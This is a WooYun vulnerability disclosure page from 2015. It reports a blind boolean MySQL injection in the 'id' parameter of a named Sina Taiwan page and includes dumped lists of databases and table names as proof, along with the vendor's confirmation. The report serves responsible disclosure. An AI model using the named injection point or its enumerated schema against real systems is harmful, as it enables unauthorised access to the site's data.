新浪台湾某站点MySQL盲注 | wooyun-2015-0104281| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104281

漏洞标题：新浪台湾某站点MySQL盲注

漏洞作者： lijiejie

提交时间：2015-03-27 20:50

修复时间：2015-05-14 12:00

公开时间：2015-05-14 12:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-27：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经确认，细节仅向厂商公开
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

新浪台湾某站点MySQL bool盲注, 可读多个库数据。

详细说明：

注射点，MySQL bool盲注

http://m.mindcity.sina.com.tw/gtest/question.php?id=2037

参数id可注入。可以读多个库的数据。

漏洞证明：

available databases [46]:
[*] `2014arwinchristmas`
[*] `2014funtaipei`
[*] `7mobile`
[*] awstats
[*] edm_tw
[*] eladies_event
[*] game
[*] google_ads
[*] horo
[*] information_schema
[*] mindcity
[*] musics
[*] mysql
[*] project_trac
[*] slidenews
[*] test
[*] tpefree
[*] tw_2013annualsale
[*] tw_2013gameshow
[*] tw_2013springkenting
[*] tw_2013vote
[*] tw_badgirls
[*] tw_bigflower
[*] tw_comeherevote
[*] tw_familytrips
[*] tw_hitfm
[*] tw_jjyounme
[*] tw_liubowen
[*] tw_lovetravel
[*] tw_milkawards2013
[*] tw_springlove
[*] tw_thinking
[*] tw_tvking
[*] tw_twofathers
[*] tw_valentine
[*] tw_vote
[*] tw_weibo_event
[*] tw_weibo_vote
[*] tw_weiboevent
[*] tw_wildlove
[*] tw_youngman
[*] url_redir
[*] weather
[*] weather100
[*] weibo
[*] weibo_app_fbconnect

Database: mindcity
[52 tables]
+-----------------+
| AdSet           |
| Advertise       |
| Animal          |
| Announce        |
| Birthday        |
| ColCat          |
| ColKind         |
| ColPage         |
| ColPhoto        |
| ColStory        |
| Commodity       |
| Divination      |
| FateBlog        |
| FocusKind       |
| FocusTopic      |
| FocusTopicBlock |
| Horo            |
| HoroGif         |
| HoroMatch       |
| HoroSz          |
| HotRecommend    |
| KeyWord         |
| LunarDate       |
| LunarHour       |
| LunarSearch     |
| Oldman          |
| ProvMatter      |
| ProvTeacher     |
| Provider        |
| QaAnswer        |
| QaJump          |
| QaKind          |
| QaQ             |
| QaQuestion      |
| RecoBlock       |
| Recommend       |
| SinaCmdy        |
| SinaCmdyKind    |
| SinaRecommend   |
| Vote            |
| WaitCmdy        |
| WaitColStory    |
| WaitFateBlog    |
| WaitProvTeacher |
| WeekLover       |
| birthday_number |
| birthday_sign   |
| captcha_codes   |
| game_log        |
| lunar2          |
| search_append   |
| videolist       |
+-----------------+

修复方案：

过滤，转换

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2015-03-30 11:59

厂商回复：

感谢支持，漏洞修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104281

漏洞标题：新浪台湾某站点MySQL盲注

相关厂商：新浪

漏洞作者： lijiejie

提交时间：2015-03-27 20:50

修复时间：2015-05-14 12:00

公开时间：2015-05-14 12:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0104281

漏洞标题：新浪台湾某站点MySQL盲注

相关厂商：新浪

漏洞作者： lijiejie

提交时间：2015-03-27 20:50

修复时间：2015-05-14 12:00

公开时间：2015-05-14 12:00

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：6

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0104281"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：